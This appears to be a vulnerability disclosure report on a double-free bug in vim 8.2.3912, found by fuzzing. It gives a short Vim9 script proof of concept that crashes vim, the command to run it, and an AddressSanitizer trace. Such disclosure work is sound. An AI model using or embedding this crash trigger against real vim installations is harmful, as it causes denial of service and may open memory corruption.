Description

Hello there! Hope you are having an awesome day! 🤗

After I saw the last Rick de Jager’s report, I decided to pick up their PoC as a valid input for fuzzing vim on its patch 8.2.3912, and ended up finding a new case of double-free!

For testing, I compiled vim with GCC 9.3.0, and my O.S. is a Linux Mint 20.04 amd64

Steps to Reproduce

Save the following file as poc:

def FirstFunction()
  def SecondFunction(
  )
  # Notice that the issue still happens if the right parenthesis
  # of the second function ends up on the next line
   
   enddef|BBBB
enddef
# Compile all functions
defcompile

After that, run vim with the following command:

vim -u NONE -X -Z -e -s -S poc -c :qa!

Running this should result in a double-free detected.

vim -u NONE -X -Z -e -s -S poc -c :qa!
free(): double free detected in tcache 2
Aborted (core dumped)

Asan Log

=================================================================
==802955==ERROR: AddressSanitizer: attempting double-free on 0x604000000410 in thread T0:
    #0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
    #1 0x11f3de5 in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
    #2 0x11f3de5 in get_function_body /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:843:8
    #3 0x121b313 in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4371:9
    #4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
    #5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
    #6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9
    #7 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
    #8 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
    #9 0xef5d80 in do_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1423:5
    #10 0xf035b7 in cmd_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:985:14
    #11 0xf035b7 in ex_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1011:2
    #12 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
    #13 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
    #14 0x14c1e61 in do_cmdline_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:588:12
    #15 0x14c1e61 in exe_commands /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:3080:2
    #16 0x14c1e61 in vim_main2 /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:774:2
    #17 0x14b9920 in main /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:426:12
    #18 0x7fd8d254a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x3cfced in _start (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x3cfced)

0x604000000410 is located 0 bytes inside of 34-byte region [0x604000000410,0x604000000432)
freed by thread T0 here:
    #0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
    #1 0x11ea6ed in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
    #2 0x11ea6ed in get_function_args /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:221:6
    #3 0x1219def in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4258:9
    #4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
    #5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
    #6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9

previously allocated by thread T0 here:
    #0 0x449d5d in malloc (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449d5d)
    #1 0x47d1d6 in lalloc /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:244:11

SUMMARY: AddressSanitizer: double-free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add) in free
==802955==ABORTING

Impact

Use after free’s / double free’s can cause in memory corruption, that can cause a crash or other undefined (potentially exploitable) behaviour.